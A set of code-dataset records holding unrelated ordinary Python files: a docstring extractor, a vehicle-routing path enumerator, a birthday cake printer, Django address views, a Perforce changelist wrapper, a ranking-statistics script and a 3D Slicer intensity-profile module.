ast.parse(module_str)\n doc_str = ast.get_docstring(module_ast)\n if doc_str is not None:\n pretty_docstring = get_pretty_docstring(doc_str)\n print(pretty_docstring, file=out_module_desc_fd)\n else:\n print(\"DCNA\", file=out_module_desc_fd)\n meta_str = input_filename\n print(meta_str, file=out_module_meta_fd)\n for node in module_ast.body:\n if isinstance(node, ast.ClassDef):\n process_class(node, out_class_decl_fd, out_class_desc_fd, out_class_meta_fd, input_filename)\n\n\ndef workflow():\n if len(sys.argv) < 6:\n give_hint()\n module_description_filename = sys.argv[1]\n module_meta_filename = sys.argv[2]\n class_decl_filename = sys.argv[3]\n class_description_filename = sys.argv[4]\n class_meta_filename = sys.argv[5]\n\n # per the docs, open returns a stream, i.e. several output file streams are created here\n module_description_fd = open(module_description_filename, \"w\", encoding=\"UTF-8\")\n module_meta_fd = open(module_meta_filename, \"w\", encoding=\"UTF-8\")\n class_decl_fd = open(class_decl_filename, \"w\", encoding=\"UTF-8\")\n class_description_fd = open(class_description_filename, \"w\", encoding=\"UTF-8\")\n class_meta_fd = open(class_meta_filename, \"w\", encoding=\"UTF-8\")\n for line in sys.stdin:\n input_filename = line.strip()\n process_module(open(input_filename, encoding=\"UTF-8\"), module_description_fd, module_meta_fd, class_decl_fd,\n class_description_fd, class_meta_fd, input_filename)\n\n print('Done.')\n\n\nif __name__ == '__main__':\n workflow()\n","sub_path":"extract_module_class.py","file_name":"extract_module_class.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"510779538","text":"import numpy as np\nimport pandas as pd\nimport time\nimport multiprocessing as 
mp\nimport logging\nimport os\nprint('Number of Core :', mp.cpu_count())\n\nROOT_DIR = os.getcwd()\nlogging.basicConfig(\n filename=ROOT_DIR + '/output/info.log',\n level=logging.WARNING,\n format='%(asctime)s | %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n)\n\nclass VehicleRoutingArrangement:\n def __init__(self, node_names, distances_matrix, tasks):\n self.full_node_names = node_names\n self.node_names = node_names['name'].values\n self.distances = distances_matrix\n self.tasks = tasks\n\n def checkRemainingTasks(self, job_done):\n remaining_tasks = self.tasks.copy()\n if len(remaining_tasks) > 0:\n active_path = self.tasks['path'].values\n job_done = job_done[np.isin(job_done, active_path)]\n\n job_unique, job_counts = np.unique(job_done, return_counts=True)\n job_done_df = pd.DataFrame(\n {'path': job_unique, 'Count': job_counts})\n\n merged_df = remaining_tasks.merge(\n job_done_df, on='path', how='outer')\n merged_df.loc[merged_df['Count_y'].isnull(), 'Count_y'] = 0\n merged_df['Count'] = merged_df['Count_x'] - merged_df['Count_y']\n output = merged_df[merged_df['Count'] >\n 0][['Start', 'End', 'path', 'Count']]\n return output\n else:\n return remaining_tasks\n\n def startOrEnd(self, current_position, rm_task):\n start_set = rm_task['Start'].unique()\n if current_position in start_set:\n return rm_task[rm_task['Start'] == current_position]['End'].values\n else:\n return start_set\n\n def nextJobsMatrix(self, job_done, next_nodes):\n current_position = job_done[-1].split('-')[-1]\n next_jobs = current_position + '-' + next_nodes\n\n if len(job_done[0]) > 1:\n ini_mat = np.tile(job_done, (len(next_jobs), 1))\n output = np.hstack((ini_mat, np.array([next_jobs]).T))\n else:\n output = np.array([next_jobs]).T\n return output\n\n def jobMatrix(self, each_row):\n remaining_jobs = self.checkRemainingTasks(each_row)\n if len(remaining_jobs) == 0:\n job_matrix = np.append(each_row, '0')\n else:\n current_position = each_row[-1].split('-')[-1]\n next_nodes = self.startOrEnd(current_position, remaining_jobs)\n job_matrix = self.nextJobsMatrix(each_row, next_nodes)\n return job_matrix\n\n def currentPosition(self, x):\n return x.split('-')[-1]\n\n def getUniqueRows(self, output):\n # re-output to unique matrix\n old_output = output.copy()\n vCurrentPos = np.vectorize(self.currentPosition)\n last_position = old_output[:, -1]\n current_pos_arr = vCurrentPos(last_position)\n output.sort(axis=1)\n all_groups = pd.DataFrame({\n 'tasks': [\"\".join(i) for i in output.astype(str)],\n 'current_pos': list(current_pos_arr),\n 'id': range(len(current_pos_arr))}).groupby(['tasks', 'current_pos'])\n unique_index = all_groups.first()['id'].values\n output = old_output[unique_index, :]\n return output\n\n def allPath(self, output):\n # Pool Multiple Processing\n pool = mp.Pool(processes=23)\n last_column = output[:, -1]\n all_zero = sum(last_column == '0')\n while all_zero != len(last_column):\n start_time = time.time()\n output_list = pool.map(self.jobMatrix, output)\n output = np.vstack(output_list)\n output = self.getUniqueRows(output)\n\n last_column = output[:, -1]\n all_zero = sum(last_column == '0')\n\n stop_time = time.time() - start_time\n logging.warning('Output Matrix Shape :' + str(output.shape) +', Use Time :' + str(stop_time) + 's')\n np.save('output/output.npy', output)\n del output_list\n return output\n\n def getDistance(self, startEndStr):\n tasks_arr = self.tasks['path'].values\n if startEndStr == '0':\n return 0\n else:\n start, end = startEndStr.split('-')\n i, j = np.where(self.node_names == 
start)[\n 0][0], np.where(self.node_names == end)[0][0]\n return self.distances[i, j] if startEndStr in tasks_arr else -1*self.distances[i, j]\n\n def sumDistance(self, distance_arr):\n all_distances = sum(distance_arr)\n pos_distances = sum(distance_arr[distance_arr > 0])\n neg_distances = sum(distance_arr[distance_arr < 0])\n abs_distances = pos_distances + abs(neg_distances)\n return pos_distances, neg_distances, all_distances, abs_distances\n\n def allDistancePath(self, all_path):\n getDistanceAllElement = np.vectorize(self.getDistance)\n result_array = getDistanceAllElement(all_path)\n all_distance_path = np.apply_along_axis(\n self.sumDistance, 1, result_array)\n return all_distance_path\n\n def getTaskName(self, task_path):\n name_arr = self.full_node_names['name'].values\n only_task = task_path[task_path != '0']\n\n # separate the start and end points\n def start_f(x): return x.split('-')[0]\n start_vf = np.vectorize(start_f)\n start_node = start_vf(only_task)\n\n def end_f(y): return y.split('-')[1]\n end_vf = np.vectorize(end_f)\n end_node = end_vf(only_task)\n\n row_num = len(only_task)\n\n name_list = []\n distance_list = []\n for i in range(row_num):\n # name\n start_name = self.full_node_names[self.full_node_names['name']\n == start_node[i]]['node'].values[0]\n end_name = self.full_node_names[self.full_node_names['name']\n == end_node[i]]['node'].values[0]\n name = start_name + '-' + end_name\n name_list.append(name)\n\n # distance\n start, end = start_node[i], end_node[i]\n m, n = np.where(name_arr == start)[\n 0][0], np.where(name_arr == end)[0][0]\n before_path = only_task[0:i]\n remaining_tasks = self.checkRemainingTasks(before_path)\n current_task = task_path[i]\n if current_task in remaining_tasks['path'].values:\n distance_list.append(self.distances[m, n])\n else:\n distance_list.append(-self.distances[m, n])\n\n return pd.DataFrame({'Name': name_list, 'Distance': distance_list})\n\n\nstart_point = np.array([['S']]) # start_point\nnode_names = pd.read_csv('data/node_names.csv')\ndistances = pd.read_csv('data/distances_matrix.csv', header=None).values\ntasks = pd.read_csv('data/tasks.csv')[['Start', 'End', 'Count']]\ntasks['path'] = tasks['Start'] + '-' + tasks['End']\n\nvehicleObj = VehicleRoutingArrangement(node_names, distances, tasks)\nall_path = vehicleObj.allPath(start_point)\nnp.save('output/all_path.npy', all_path)\n","sub_path":"script/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62033260","text":"# Python3 code to calculate age in years\nfrom datetime import date\n\ndef calculateAge(birthDate):\n today = date.today()\n age = today.year - birthDate.year -((today.month, today.day) <\n (birthDate.month, birthDate.day))\n return age\n\n# Driver code\n# print(calculateAge(date(1997, 2, 3)), \"years\")\n\nbirth_year = int(input(\"Enter Year of Birth \"))\nbirth_month = int(input(\"Enter Month of Birth \"))\nbirth_day = int(input(\"Enter day of Birth \"))\n\nage = calculateAge(date(birth_year, birth_month, birth_day))\ncandles_num = age % 10\ndashes_calc = int((18-candles_num)/2)\ndashes = '_' * dashes_calc\n\n\ndef cake(candles,dash):\n print(' ' + dash + 'i' * candles + dash + ' ')\n print(' | :H:a:p:p:y: |')\n print(' _|________________|_')\n print(' |^^^^^^^^^^^^^^^^^^|')\n print(' | :B:i:r:t:h:d:a:y:|')\n print(' | |')\n print(' ~~~~~~~~~~~~~~~~~~~~')\n\nif age % 4 == 0:\n # an age divisible by 4 gets the cake printed twice\n cake(candles_num, dashes)\n cake(candles_num, dashes)\nelse:\n cake(candles_num, 
dashes)\n","sub_path":"Week4/Day2/DailyChallenge/DC.py","file_name":"DC.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"315650640","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Addresses\nfrom .serializers import AddressesSerializer\nfrom rest_framework.parsers import JSONParser\n\n# Create your views here.\n@csrf_exempt\ndef address_list(request):\n if request.method == 'GET':\n query_set = Addresses.objects.all()\n serializer = AddressesSerializer(query_set, many=True)\n return JsonResponse(data=serializer.data, safe=False)\n \n elif request.method == 'POST':\n data = JSONParser().parse(request)\n serializer = AddressesSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n \n return JsonResponse(serializer.errors, status=400)\n \n@csrf_exempt\ndef address(request, pk):\n obj = Addresses.objects.get(pk=pk)\n if request.method == 'GET':\n serializer = AddressesSerializer(obj)\n return JsonResponse(serializer.data, safe=False)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = AddressesSerializer(obj, data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n \n elif request.method == 'DELETE':\n obj.delete()\n return HttpResponse(status=204)\n","sub_path":"project/backend/contactlist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"88565003","text":"# -*- coding: utf-8 -*-\n\nimport re\n\nimport gevent.monkey\n\nfrom Logger import Logger\n\ngevent.monkey.patch_all(subprocess=True)\n\nimport gevent.subprocess\n\n\nclass PerforceConnectionError(Exception):\n pass\n\n\nclass Perforce:\n def __init__(self, server, port, p4_id, p4_pass, filelist_cnt, bot_name, encoding='utf-8'):\n self.logger = Logger('Perforce_' + bot_name)\n\n self.server = server\n self.port = str(port)\n self.p4_id = p4_id\n self.p4_pass = p4_pass\n self.filelist_cnt = int(filelist_cnt)\n self.encoding = encoding\n\n self.logger.info('Perforce', 'initialized')\n\n # handle running a p4 command\n def get_p4_data(self, command, *args):\n command = ['./p4', '-p', self.server + ':' + self.port, '-u', self.p4_id, '-P', self.p4_pass, command]\n p4 = gevent.subprocess.Popen(command + list(args), stdout=gevent.subprocess.PIPE, stderr=gevent.subprocess.PIPE)\n out, err = p4.communicate()\n\n if not out:\n out = ''\n if not err:\n err = ''\n\n out = out.split('\\n')\n err = err.split('\\n')\n\n if len(out) == 0:\n if len(err) != 0:\n self.logger.error('connection problem!')\n self.logger.error('===================')\n for line in err:\n self.logger.error('', line)\n self.logger.error('===================')\n\n raise PerforceConnectionError\n\n return out\n\n # return the list of change_num for a specific user and date range\n def list_change_num(self, user, target_date_from, target_date_to):\n self.logger.info('get change_num list', user, target_date_from, target_date_to)\n try:\n out = self.get_p4_data('changes', '-u', user, target_date_from.strftime(\"@%Y/%m/%d:%H:%M:%S\") + ',' + target_date_to.strftime(\"@%Y/%m/%d:%H:%M:%S\"))\n except:\n self.logger.info('get change_num list', 'failed')\n raise\n\n change_list = []\n for 
line in out:\n change_list += re.findall(\"Change (\\d+) on (\\d+)\\/(\\d+)\\/(\\d+) by ([^ ]+)@([^ ]+) '.+'\", line)\n\n change_num_list = []\n for change in change_list:\n change_num, year, month, day, client, workspace = change\n change_num_list.append(change_num)\n\n self.logger.info('get change_num list', user, 'done')\n return change_num_list\n\n # return the file modification details for a specific user and date range\n def list_changelist(self, user, target_date_from, target_date_to):\n self.logger.info('get description list', user, target_date_from, target_date_to)\n\n change_num_list = self.list_change_num(user, target_date_from, target_date_to)\n\n rendered_changelists = []\n for change_num in change_num_list:\n try:\n out = self.get_p4_data('describe', str(change_num))\n except:\n self.logger.info('cannot get description', change_num)\n continue\n\n description = []\n filelist = []\n description_done = False\n\n change_info = out[0]\n out = out[1:]\n\n for line in out:\n if 'Affected files ...' in line:\n description_done = True\n continue\n if 'Differences ...' in line:\n break\n\n if description_done:\n filelist += re.findall('... (.+)', line)\n else:\n description.append(line.decode(self.encoding).strip())\n\n for i in range(len(filelist)):\n filelist[i] = filelist[i].decode(self.encoding)\n\n if len(filelist) > self.filelist_cnt:\n cnt = len(filelist)\n filelist = filelist[0:self.filelist_cnt]\n filelist.append(u'(... rest omitted, ' + unicode(cnt) + u' files in total)')\n\n description = description[1:-1]\n\n rendered_changelists.append({'change_info': change_info, 'num': change_num, 'description': description, 'filelist': filelist})\n\n return rendered_changelists\n","sub_path":"Perforce.py","file_name":"Perforce.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"460839893","text":"import math\nimport lib\nclass Num:\n def __init__(i):\n i.mu = {}\n i.sum = {}\n i.m2 = {}\n i.var = {}\n i.n = {}\n i.x = {}\n i.label = {}\n i.name = []\n \nclass Div:\n def __init__(i):\n i.total = []\n i.cohen = []\n i.mittas = []\n i.a12 = []\n i.order = {}\n i.level = 0\n \ndef ranks(filename, a, outfile):\n outfile.write(\"\\n----|\"+ filename+\"|---------------------\\n\")\n f = open(filename)\n _Nums = Num()\n _Div = Div()\n obs(f,0,_Nums,_Div)\n rank(0,_Nums,_Div,a)\n maxv = len(_Div.order.keys())\n for i in range(maxv): \n i = maxv - i\n k = _Div.order[i]['=']\n outfile.write(k.ljust(18)+ ':mu'.ljust(5)+ ('%4.2f'%(_Nums.mu[k])).ljust(6)+ ':rank'.ljust(6)+ str(_Nums.label[k])+'\\n')\n \ndef obs(f, all, _Nums, _Div):\n now = all\n line = f.readline()\n while line:\n line = line.split()\n for i in line:\n if i[0].isdigit(): \n v = float(i)\n inc(v, now, _Nums)\n inc(v, all, _Nums)\n else: now = i\n line = f.readline()\n f.close()\n\n for i in _Nums.name:\n if i != all:\n temp={}\n temp['='] = i\n temp['x'] = _Nums.mu[i]\n _Div.order[i] = temp\n s = 0\n norder = {}\n while s < len(_Nums.name)-1:\n tmp = 10**17\n ind = 0\n s = s+1\n norder[s] = {}\n for i in _Div.order.keys():\n if tmp > _Div.order[i]['x']: \n tmp = _Div.order[i]['x']\n ind = i\n norder[s]['='] = _Div.order[ind]['=']\n norder[s]['x'] = _Div.order[ind]['x']\n del _Div.order[ind] \n _Div.order = norder \ndef inc(v, k, nums): \n nums.label[k] = 0\n if k not in nums.name:\n nums.name += [k]\n nums.n[k] = 0\n all = nums.n[k] = nums.n[k] + 1\n nums.x[k] = []\n nums.sum[k] = v\n delta = float(v)\n nums.mu[k] = float(delta/all)\n nums.m2[k] = 0\n nums.var[k] = 0\n else:\n all = nums.n[k] = 
nums.n[k] + 1\n nums.sum[k] = nums.sum[k] + v\n delta = v - nums.mu[k]\n nums.mu[k] = nums.mu[k] + delta/all\n nums.m2[k] = nums.m2[k] + float(delta*(v-nums.mu[k]))\n nums.var[k] = float(nums.m2[k])/float(all - 1 + lib.PINCH) \n nums.x[k] += [v] \n \ndef rank(all,nums,div,a):\n div.cohen = float(a[\"-cohen\"])*math.sqrt(nums.var[all])\n div.mittas = a[\"--mittas\"]\n div.a12 = a[\"-a12\"]\n div.level = 0\n div.total = nums.n[all]\n rdiv(1,len(div.order.keys()),1,nums, div)\n\n\ndef rdiv(lo, hi, c, nums, div):\n cut = divm(lo, hi, nums, div)\n if cut:\n div.level = div.level + 1\n c = rdiv(lo, cut-1, c, nums, div) + 1\n c = rdiv(cut, hi, c, nums, div)\n else:\n for i in range(lo, hi+1): nums.label[div.order[i]['=']] = c\n return c\n\ndef divInits(lo,hi,nums,div,num0,num1):\n b= div.order[lo][\"=\"]; \n num0.n[lo]= nums.n[b]; \n num0.sum[lo]= nums.sum[b]\n b= div.order[hi][\"=\"]; \n num1.n[hi]= nums.n[b]; \n num1.sum[hi]= nums.sum[b]\n for i in range(hi-1, lo-1, -1):\n b = div.order[i]['=']\n num1.n[i] = num1.n[i+1] + nums.n[b]\n num1.sum[i] = num1.sum[i+1] + nums.sum[b]\n return num1.sum[lo]/num1.n[lo]\n\n\ndef divm(lo, hi, nums, div):\n num0 = Num()\n num1 = Num()\n muAll = divInits(lo,hi,nums, div, num0, num1)\n maxv = -1\n cut = None\n for i in range(lo+1, hi+1):\n b = div.order[i]['=']\n num0.n[i] = num0.n[i-1] + nums.n[b]\n num0.sum[i] = num0.sum[i-1] + nums.sum[b]\n left = num0.n[i]\n muLeft = num0.sum[i]/left\n right = num1.n[i]\n muRight = num1.sum[i]/right\n e = errDiff(muAll, left, muLeft, right, muRight)\n if div.cohen:\n if abs(muLeft - muRight) <= float(div.cohen): continue\n if div.mittas:\n if e < maxv:continue\n if div.a12:\n if bigger(lo, i, hi, nums, div) < float(div.a12):continue\n maxv = e\n cut = i \n return cut \n\ndef errDiff(mu, n0, mu0, n1, mu1):\n return n0*(mu - mu0)**2.0 + n1*(mu - mu1)**2.0\n \ndef bigger(lo, mid, hi, nums, div):\n below = values(lo, mid-1, nums, div)\n above = values(mid, hi, nums, div)\n return a12statistic(below, above)\n \ndef values(i, j, nums, div):\n out = []\n for k in range(i, j+1):\n b = div.order[k]['=']\n out += nums.x[b]\n return out\n\ndef a12statistic(below, above):\n comparisons = more = same = 0 \n for j in range(len(above)):\n for i in range(len(below)):\n comparisons = comparisons + 1\n more = more + 1 if above[j] > below[i] else more\n same = same + 1 if above[j] == below[i] else same\n return (more + 0.5*same)/comparisons\n\n","sub_path":"CS573_DataMining_Python/Proj1i_DataReduction/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"175719777","text":"import os\nimport unittest\nimport vtk\nimport qt\nimport ctk\nimport slicer\nfrom slicer.ScriptedLoadableModule import *\nimport logging\n\n#\n# LineIntersityProfile\n#\n\n\nclass LineIntersityProfile(ScriptedLoadableModule):\n\n \"\"\"Uses ScriptedLoadableModule base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n # TODO make this more human readable by adding spaces\n self.parent.title = \"LineIntersityProfile\"\n self.parent.categories = [\"Examples\"]\n self.parent.dependencies = []\n # replace with \"Firstname Lastname (Organization)\"\n self.parent.contributors = [\"John Doe (AnyWare Corp.)\"]\n self.parent.helpText = \"\"\"\n This is an example of scripted loadable module bundled in an 
extension.\n It performs a simple thresholding on the input volume and optionally captures a screenshot.\n \"\"\"\n self.parent.acknowledgementText = \"\"\"\n This file was originally developed by Jean-Christophe Fillion-Robin, Kitware Inc.\n and Steve Pieper, Isomics, Inc. and was partially funded by NIH grant 3P41RR013218-12S1.\n\"\"\" # replace with organization, grant and thanks.\n\n#\n# LineIntersityProfileWidget\n#\n\n\nclass LineIntersityProfileWidget(ScriptedLoadableModuleWidget):\n\n \"\"\"Uses ScriptedLoadableModuleWidget base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def setup(self):\n ScriptedLoadableModuleWidget.setup(self)\n\n # Instantiate and connect widgets ...\n\n #\n # Parameters Area\n #\n parametersCollapsibleButton = ctk.ctkCollapsibleButton()\n parametersCollapsibleButton.text = \"Parameters\"\n self.layout.addWidget(parametersCollapsibleButton)\n\n # Layout within the dummy collapsible button\n parametersFormLayout = qt.QFormLayout(parametersCollapsibleButton)\n\n #\n # Fisrt input volume selector\n #\n self.inputSelector1 = slicer.qMRMLNodeComboBox()\n self.inputSelector1.nodeTypes = ((\"vtkMRMLScalarVolumeNode\"), \"\")\n self.inputSelector1.addAttribute(\n \"vtkMRMLScalarVolumeNode\", \"LabelMap\", 0)\n self.inputSelector1.selectNodeUponCreation = True\n self.inputSelector1.addEnabled = False\n self.inputSelector1.removeEnabled = False\n self.inputSelector1.noneEnabled = False\n self.inputSelector1.showHidden = False\n self.inputSelector1.showChildNodeTypes = False\n self.inputSelector1.setMRMLScene(slicer.mrmlScene)\n self.inputSelector1.setToolTip(\"Pick the first input\")\n parametersFormLayout.addRow(\"First Volume\", self.inputSelector1)\n\n #\n # Second input volume selector\n #\n self.inputSelector2 = slicer.qMRMLNodeComboBox()\n self.inputSelector2.nodeTypes = ((\"vtkMRMLScalarVolumeNode\"), \"\")\n self.inputSelector2.addAttribute(\n \"vtkMRMLScalarVolumeNode\", \"LabelMap\", 0)\n self.inputSelector2.selectNodeUponCreation = True\n self.inputSelector2.addEnabled = False\n self.inputSelector2.removeEnabled = False\n self.inputSelector2.noneEnabled = False\n self.inputSelector2.showHidden = False\n self.inputSelector2.showChildNodeTypes = False\n self.inputSelector2.setMRMLScene(slicer.mrmlScene)\n self.inputSelector2.setToolTip(\"Pick the second input\")\n parametersFormLayout.addRow(\"Second Volume\", self.inputSelector2)\n #\n # output volume selector\n #\n # self.outputSelector = slicer.qMRMLNodeComboBox()\n # self.outputSelector.nodeTypes = [\"vtkMRMLScalarVolumeNode\"]\n # self.outputSelector.selectNodeUponCreation = True\n # self.outputSelector.addEnabled = True\n # self.outputSelector.removeEnabled = True\n # self.outputSelector.noneEnabled = True\n # self.outputSelector.showHidden = False\n # self.outputSelector.showChildNodeTypes = False\n # self.outputSelector.setMRMLScene(slicer.mrmlScene)\n # self.outputSelector.setToolTip(\"Pick the output to the algorithm.\")\n # parametersFormLayout.addRow(\"Output Volume: \", self.outputSelector)\n\n #\n # Ruler selector\n #\n self.rulerSelector = slicer.qMRMLNodeComboBox()\n self.rulerSelector.nodeTypes = ((\"vtkMRMLAnnotationRulerNode\"), \"\")\n self.rulerSelector.selectNodeUponCreation = True\n self.rulerSelector.addEnabled = False\n self.rulerSelector.removeEnabled = False\n self.rulerSelector.noneEnabled = False\n self.rulerSelector.showHidden = False\n self.rulerSelector.showChildNodeTypes = False\n 
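# Note: the filter flags above are configured before the scene is attached, since the selector populates its node list once setMRMLScene() is called below.\n 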
self.rulerSelector.setMRMLScene(slicer.mrmlScene)\n self.rulerSelector.setToolTip(\"Pick the ruler to sample along.\")\n parametersFormLayout.addRow(\"Ruler: \", self.rulerSelector)\n\n #\n # Apply Button\n #\n self.applyButton = qt.QPushButton(\"Apply\")\n self.applyButton.toolTip = \"Run the algorithm.\"\n self.applyButton.enabled = True\n parametersFormLayout.addRow(self.applyButton)\n\n # connections\n self.applyButton.connect('clicked(bool)', self.onApplyButton)\n # self.inputSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelect)\n # self.outputSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelect)\n\n # Add vertical spacer\n self.layout.addStretch(1)\n\n # Refresh Apply button state\n self.onSelect()\n\n def cleanup(self):\n pass\n\n def onSelect(self):\n self.applyButton.enabled = self.inputSelector1.currentNode(\n ) and self.inputSelector2.currentNode()\n\n def onApplyButton(self):\n logic = LineIntersityProfileLogic()\n print(\"Run the algorithm\")\n logic.run(self.inputSelector1.currentNode(),\n self.inputSelector2.currentNode(),\n self.rulerSelector.currentNode())\n\n#\n# LineIntersityProfileLogic\n#\n\n\nclass LineIntersityProfileLogic(ScriptedLoadableModuleLogic):\n\n \"\"\"This class should implement all the actual\n computation done by your module. The interface\n should be such that other python code can import\n this class and make use of the functionality without\n requiring an instance of the Widget.\n Uses ScriptedLoadableModuleLogic base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def hasImageData(self, volumeNode):\n \"\"\"This is an example logic method that\n returns true if the passed in volume\n node has valid image data\n \"\"\"\n if not volumeNode:\n logging.debug('hasImageData failed: no volume node')\n return False\n if volumeNode.GetImageData() is None:\n logging.debug('hasImageData failed: no image data in volume node')\n return False\n return True\n\n def isValidInputOutputData(self, inputVolumeNode, outputVolumeNode):\n \"\"\"Validates if the output is not the same as input\n \"\"\"\n if not inputVolumeNode:\n logging.debug(\n 'isValidInputOutputData failed: no input volume node defined')\n return False\n if not outputVolumeNode:\n logging.debug(\n 'isValidInputOutputData failed: no output volume node defined')\n return False\n if inputVolumeNode.GetID() == outputVolumeNode.GetID():\n logging.debug(\n 'isValidInputOutputData failed: input and output volume is the same. 
Create a new volume for output to avoid this error.')\n return False\n return True\n\n def takeScreenshot(self, name, description, type=-1):\n # show the message even if not taking a screen shot\n slicer.util.delayDisplay(\n 'Take screenshot: '+description+'.\\nResult is available in the Annotations module.', 3000)\n\n lm = slicer.app.layoutManager()\n # switch on the type to get the requested window\n widget = 0\n if type == slicer.qMRMLScreenShotDialog.FullLayout:\n # full layout\n widget = lm.viewport()\n elif type == slicer.qMRMLScreenShotDialog.ThreeD:\n # just the 3D window\n widget = lm.threeDWidget(0).threeDView()\n elif type == slicer.qMRMLScreenShotDialog.Red:\n # red slice window\n widget = lm.sliceWidget(\"Red\")\n elif type == slicer.qMRMLScreenShotDialog.Yellow:\n # yellow slice window\n widget = lm.sliceWidget(\"Yellow\")\n elif type == slicer.qMRMLScreenShotDialog.Green:\n # green slice window\n widget = lm.sliceWidget(\"Green\")\n else:\n # default to using the full window\n widget = slicer.util.mainWindow()\n # reset the type so that the node is set correctly\n type = slicer.qMRMLScreenShotDialog.FullLayout\n\n # grab and convert to vtk image data\n qpixMap = qt.QPixmap().grabWidget(widget)\n qimage = qpixMap.toImage()\n imageData = vtk.vtkImageData()\n slicer.qMRMLUtils().qImageToVtkImageData(qimage, imageData)\n\n annotationLogic = slicer.modules.annotations.logic()\n annotationLogic.CreateSnapShot(name, description, type, 1, imageData)\n\n def run(self, volumeNode1, volumeNode2, rulerNode):\n \"\"\"\n Run the actual algorithm\n \"\"\"\n print('LineIntensityProfileLogic run() called')\n\n \"\"\"\n S1. Get the list of intensity samples along the ruler\n S2. Set up quantitative layout\n S3. Use the chart view to plot the intensity samples\n \"\"\"\n\n # S1. Get the list of samples\n if not rulerNode or (not volumeNode1 and not volumeNode2):\n print('Inputs are not initialised!')\n return\n\n volumeSamples1 = None\n volumeSamples2 = None\n\n if volumeNode1:\n volumeSamples1 = self.probeVolume(volumeNode1, rulerNode)\n if volumeNode2:\n volumeSamples2 = self.probeVolume(volumeNode2, rulerNode)\n\n print('VolumeSamples1 = ' + str(volumeSamples1))\n print('VolumeSamples2 = ' + str(volumeSamples2))\n\n # Running showChart() method\n imageSamples = [volumeSamples1, volumeSamples2]\n legendNames = [volumeNode1.GetName()+' - '+rulerNode.GetName(),\n volumeNode2.GetName()+' - '+rulerNode.GetName()]\n self.showChart(imageSamples, legendNames)\n\n return True\n\n def probeVolume(self, volumeNode, rulerNode):\n\n # get ruler endpoints coordinates in RAS\n p0ras = rulerNode.GetPolyData().GetPoint(0) + (1,)\n p1ras = rulerNode.GetPolyData().GetPoint(1) + (1,)\n\n # RAS --> IJK\n ras2ijk = vtk.vtkMatrix4x4()\n volumeNode.GetRASToIJKMatrix(ras2ijk)\n p0ijk = [int(round(c)) for c in ras2ijk.MultiplyPoint(p0ras)[:3]]\n p1ijk = [int(round(c)) for c in ras2ijk.MultiplyPoint(p1ras)[:3]]\n\n # Create VTK line that will be used for sampling\n line = vtk.vtkLineSource()\n line.SetResolution(100)\n line.SetPoint1(p0ijk)\n line.SetPoint2(p1ijk)\n\n # Create VTK probe filter and sample the image\n probe = vtk.vtkProbeFilter()\n probe.SetInputConnection(line.GetOutputPort())\n probe.SetSourceData(volumeNode.GetImageData())\n probe.Update()\n\n # Return VTK array\n return probe.GetOutput().GetPointData().GetArray('ImageScalars')\n\n def showChart(self, samples, names):\n print('Logic showing chart\\n')\n\n # S2. 
Switch to a layout containing a chart viewer\n lm = slicer.app.layoutManager()\n lm.setLayout(\n slicer.vtkMRMLLayoutNode.SlicerLayoutFourUpQuantitativeView)\n\n # Initialise double array MRML node for each sample list\n # since this is what chart view MRML node needs\n doubleArrays = []\n for sample in samples:\n arrayNode = slicer.mrmlScene.AddNode(\n slicer.vtkMRMLDoubleArrayNode())\n array = arrayNode.GetArray()\n nDataPoints = sample.GetNumberOfTuples()\n array.SetNumberOfTuples(nDataPoints)\n array.SetNumberOfComponents(3)\n for i in range(nDataPoints):\n array.SetComponent(i, 0, i)\n array.SetComponent(i, 1, sample.GetTuple1(i))\n array.SetComponent(i, 2, 0)\n\n doubleArrays.append(arrayNode)\n\n # S3. Get the chart view MRML node\n cvNodes = slicer.mrmlScene.GetNodesByClass('vtkMRMLChartViewNode')\n cvNodes.SetReferenceCount(cvNodes.GetReferenceCount()-1)\n cvNodes.InitTraversal()\n cvNode = cvNodes.GetNextItemAsObject()\n\n # Create a new chart node\n chartNode = slicer.mrmlScene.AddNode(slicer.vtkMRMLChartNode())\n for pairs in zip(names, doubleArrays):\n chartNode.AddArray(pairs[0], pairs[1].GetID())\n cvNode.SetChartNodeID(chartNode.GetID())\n\n return\n\n\nclass LineIntersityProfileTest(ScriptedLoadableModuleTest):\n\n \"\"\"\n This is the test case for your scripted module.\n Uses ScriptedLoadableModuleTest base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def setUp(self):\n \"\"\" Do whatever is needed to reset the state - typically a scene clear will be enough.\n \"\"\"\n slicer.mrmlScene.Clear(0)\n\n def runTest(self):\n \"\"\"Run as few or as many tests as needed here.\n \"\"\"\n self.setUp()\n self.test_LineIntersityProfile1()\n\n 